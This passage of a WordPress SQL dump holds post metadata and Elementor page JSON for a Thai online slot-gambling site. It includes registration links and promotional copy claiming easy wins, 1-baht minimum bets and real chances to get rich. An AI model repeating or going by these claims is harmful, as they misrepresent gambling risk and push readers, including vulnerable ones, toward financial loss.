4:\"file\";s:40:\"cropped-cropped-Yok789-loggo-300x75.webp\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8434;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"cropped-cropped-Yok789-loggo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4210;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"cropped-cropped-Yok789-loggo-768x192.webp\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24234;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2300,272,'_wp_attachment_image_alt','ปั่น สล็อต ฟรี ทดลอง'),(2311,271,'_wp_attachment_image_alt','ปั่น สล็อต 1 บาท'),(2328,323,'_elementor_source','post'),(2329,323,'_elementor_edit_mode','builder'),(2330,323,'_elementor_template_type','header'),(2331,323,'_elementor_version','3.35.5'),(2332,323,'_elementor_pro_version','3.32.3'),(2333,323,'_wp_page_template','default'),(2334,323,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#0b6c0c\",\"background_color_b\":\"#140106\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"align_items\":\"center\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2335,323,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(2342,324,'_thumbnail_id','273'),(2343,324,'_elementor_edit_mode','builder'),(2344,324,'_elementor_template_type','wp-page'),(2345,324,'_elementor_version','3.35.5'),(2346,324,'_elementor_pro_version','3.32.3'),(2347,324,'_wp_page_template','default'),(2348,324,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2349,324,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 